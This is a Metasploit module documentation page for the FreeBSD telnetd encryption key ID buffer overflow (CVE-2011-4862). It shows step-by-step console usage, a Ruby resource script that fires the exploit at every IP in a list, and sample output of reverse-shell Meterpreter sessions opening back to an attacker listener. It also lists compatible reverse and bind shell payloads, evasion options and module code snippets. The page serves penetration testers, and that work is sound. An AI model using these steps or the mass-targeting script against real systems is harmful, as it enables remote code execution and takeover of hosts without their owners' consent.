FreeBSD Telnet Service Encryption Key ID Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/freebsd/telnet/telnet_encrypt_keyid metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
Module: exploit/freebsd/telnet/telnet_encrypt_keyid
Source code: modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
Disclosure date: 2011-12-23
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): BSD
Target service / protocol: telnet
Target network port(s): 23
List of CVEs: CVE-2011-4862

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using telnet_encrypt_keyid against a single host

Normally, you can use exploit/freebsd/telnet/telnet_encrypt_keyid this way:

msf > use exploit/freebsd/telnet/telnet_encrypt_keyid
msf exploit(telnet_encrypt_keyid) > show targets
    ... a list of targets ...
msf exploit(telnet_encrypt_keyid) > set TARGET target-id
msf exploit(telnet_encrypt_keyid) > show options
    ... show and set options ...
msf exploit(telnet_encrypt_keyid) > exploit

Using telnet_encrypt_keyid against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your telnet_encrypt_keyid will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/freebsd/telnet/telnet_encrypt_keyid")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the freebsd/telnet/telnet_encrypt_keyid exploit module looks in the msfconsole:

msf6 > use exploit/freebsd/telnet/telnet_encrypt_keyid

[*] No payload configured, defaulting to bsd/x86/shell/reverse_tcp
msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show info

       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
     Module: exploit/freebsd/telnet/telnet_encrypt_keyid
   Platform: BSD
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2011-12-23

Provided by:
  Jaime Penalba Estebanez <[email protected]>
  Brandon Perry <[email protected]>
  Dan Rosenberg
  hdm <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     23               yes       The target port (TCP)
  USERNAME                   no        The username to authenticate as

Payload information:
  Space: 128
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in the encryption option 
  handler of the FreeBSD telnet service.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2011-4862
  OSVDB (78020)
  http://www.securityfocus.com/bid/51182
  https://www.exploit-db.com/exploits/18280

Module Options


This is a complete list of options available in the freebsd/telnet/telnet_encrypt_keyid exploit:

msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show options

Module options (exploit/freebsd/telnet/telnet_encrypt_keyid):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     23               yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as

Payload options (bsd/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the freebsd/telnet/telnet_encrypt_keyid exploit:

msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show advanced

Module advanced options (exploit/freebsd/telnet/telnet_encrypt_keyid):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TelnetBannerTimeout     25               yes       The number of seconds to wait for the initial banner
   TelnetTimeout           10               yes       The number of seconds to wait for a reply from a Telnet command
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (bsd/x86/shell/reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   EnableStageEncoding         false            no        Encode the second stage payload
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PayloadUUIDName                              no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                               no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                              no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking         false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries             0                yes       How many additional successful pingbacks
   PingbackSleep               30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StageEncoder                                 no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                    no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback       true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the freebsd/telnet/telnet_encrypt_keyid module can exploit:

msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   FreeBSD 8.2
   2   FreeBSD 8.1
   3   FreeBSD 8.0
   4   FreeBSD 7.3/7.4
   5   FreeBSD 7.0/7.1/7.2
   6   FreeBSD 6.3/6.4
   7   FreeBSD 6.0/6.1/6.2
   8   FreeBSD 5.5
   9   FreeBSD 5.3

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the freebsd/telnet/telnet_encrypt_keyid exploit:

msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show payloads

Compatible Payloads
===================

   #   Name                                    Disclosure Date  Rank    Check  Description
   -   ----                                    ---------------  ----    -----  -----------
   0   payload/bsd/x86/exec                                     normal  No     BSD Execute Command
   1   payload/bsd/x86/metsvc_bind_tcp                          normal  No     FreeBSD Meterpreter Service, Bind TCP
   2   payload/bsd/x86/metsvc_reverse_tcp                       normal  No     FreeBSD Meterpreter Service, Reverse TCP Inline
   3   payload/bsd/x86/shell/bind_ipv6_tcp                      normal  No     BSD Command Shell, Bind TCP Stager (IPv6)
   4   payload/bsd/x86/shell/bind_tcp                           normal  No     BSD Command Shell, Bind TCP Stager
   5   payload/bsd/x86/shell/reverse_ipv6_tcp                   normal  No     BSD Command Shell, Reverse TCP Stager (IPv6)
   6   payload/bsd/x86/shell/reverse_tcp                        normal  No     BSD Command Shell, Reverse TCP Stager
   7   payload/bsd/x86/shell_bind_tcp                           normal  No     BSD Command Shell, Bind TCP Inline
   8   payload/bsd/x86/shell_bind_tcp_ipv6                      normal  No     BSD Command Shell, Bind TCP Inline (IPv6)
   9   payload/bsd/x86/shell_reverse_tcp                        normal  No     BSD Command Shell, Reverse TCP Inline
   10  payload/bsd/x86/shell_reverse_tcp_ipv6                   normal  No     BSD Command Shell, Reverse TCP Inline (IPv6)
   11  payload/bsdi/x86/shell/bind_tcp                          normal  No     BSDi Command Shell, Bind TCP Stager
   12  payload/bsdi/x86/shell/reverse_tcp                       normal  No     BSDi Command Shell, Reverse TCP Stager
   13  payload/bsdi/x86/shell_bind_tcp                          normal  No     BSDi Command Shell, Bind TCP Inline
   14  payload/bsdi/x86/shell_reverse_tcp                       normal  No     BSDi Command Shell, Reverse TCP Inline
   15  payload/generic/custom                                   normal  No     Custom Payload
   16  payload/generic/debug_trap                               normal  No     Generic x86 Debug Trap
   17  payload/generic/shell_bind_tcp                           normal  No     Generic Command Shell, Bind TCP Inline
   18  payload/generic/shell_reverse_tcp                        normal  No     Generic Command Shell, Reverse TCP Inline
   19  payload/generic/tight_loop                               normal  No     Generic x86 Tight Loop

Evasion Options


Here is the full list of possible evasion options supported by the freebsd/telnet/telnet_encrypt_keyid exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(freebsd/telnet/telnet_encrypt_keyid) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

This system does not support encryption


Here is a relevant code snippet related to the "This system does not support encryption" error message:

89:	
90:	    # Wait for a successful response
91:	    loop do
92:	      data = sock.get_once(-1, 5) rescue nil
93:	      if not data
94:	        fail_with(Failure::Unknown, "This system does not support encryption")
95:	      end
96:	      break if data.index("\xff\xfa\x26\x02\x01")
97:	    end
98:	
99:	    # The first request smashes the pointer

Server did not respond to first payload


Here is a relevant code snippet related to the "Server did not respond to first payload" error message:

101:	    sock.put(sploit)
102:	
103:	    # Make sure the server replied to the first request
104:	    data = sock.get_once(-1, 5)
105:	    unless data
106:	      print_status("Server did not respond to first payload")
107:	      return
108:	    end
109:	
110:	    # Some delay between each request seems necessary in some cases
111:	    ::IO.select(nil, nil, nil, 0.5)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Jaime Penalba Estebanez <jpenalbae[at]gmail.com>
  • Brandon Perry <bperry.volatile[at]gmail.com>
  • Dan Rosenberg
  • hdm

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.